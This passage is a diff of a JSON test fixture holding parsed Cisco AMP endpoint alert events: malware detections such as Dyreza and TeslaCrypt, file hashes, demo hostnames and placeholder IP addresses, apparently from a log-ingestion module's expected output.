"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 255197, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257963439685702", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 569000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176257963439686000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 256516, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:12:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667579691532307", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 778000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 900000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667579691532000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.id": 6180341055704007000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 257835, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 22893, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -4353,64 +700,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55807, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:52.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667575396565008", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006658", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 971000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 869000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667575396565000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 261804, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 24346, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], @@ -4418,61 +772,61 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55806, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:49.000Z", + "@timestamp": "2021-01-15T10:32:58.000Z", + "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "27:85:29:21:67:49" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257843180601413", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "27:85:29:21:67:49" ], - "cisco.amp.timestamp_nanoseconds": 536000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Cloud IOC", "event.category": [ - "file", - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 6176257843180601000, + "event.id": 1476910664322001000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:32:58.000Z", + "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "file.name": "cmd.exe", + "file.path": "/C:/WINDOWS/system32/cmd.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", + "host.name": "Demo_Command_Line_Arguments_Meterpreter", "input.type": "log", - "log.offset": 263122, + "log.offset": 25799, + "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Command_Line_Arguments_Meterpreter" ], "related.ip": [ "8.8.8.8", @@ -4485,43 +839,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:48.000Z", + "@timestamp": "2021-01-15T10:27:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648166, + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671385032556606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 25000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 82375000, - "event.action": "Uninstall", "event.dataset": "cisco.amp", - "event.id": 834324, + "event.id": 6533671385032557000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 264441, + "log.offset": 27431, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], "related.hosts": [ - "Demo_AMP_Exploit_Prevention" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4529,55 +906,50 @@ ] }, { - "@timestamp": "2021-01-15T10:12:37.000Z", + "@timestamp": "2021-01-15T10:24:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257791640993860", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 898000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Multiple Infected Files", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257791640994000, + "event.id": 1489955900329000200, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:24:58.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 265349, + "log.offset": 28756, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_Dyre" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", @@ -4590,60 +962,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:25.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257740101386307", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 901000000, + "cisco.amp.timestamp_nanoseconds": 947000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257740101386000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 266668, + "log.offset": 30055, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4651,60 +1029,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:13.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257688561778754", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 874000000, + "cisco.amp.timestamp_nanoseconds": 926000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257688561779000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 267987, + "log.offset": 31381, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4712,60 +1094,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:02.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257641317138497", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 236000000, + "cisco.amp.timestamp_nanoseconds": 533000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257641317138000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 269306, + "log.offset": 32700, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4773,7 +1159,7 @@ ] }, { - "@timestamp": "2021-01-15T10:11:52.000Z", + "@timestamp": "2021-01-15T10:22:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -4784,42 +1170,39 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667317698527247", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 641000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Executed malware", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667317698527000, + "event.id": 15212386047828, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "event.severity": 3, + "event.start": "2021-01-15T10:22:29.000Z", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.path": "file:///C%3A/ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 270625, + "log.offset": 34019, + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" ], "related.hosts": [ "Demo_AMP_Threat_Audit" @@ -4828,9 +1211,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4838,60 +1218,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:50.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257589777530944", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643250", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 224000000, + "cisco.amp.timestamp_nanoseconds": 973000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257589777531000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - 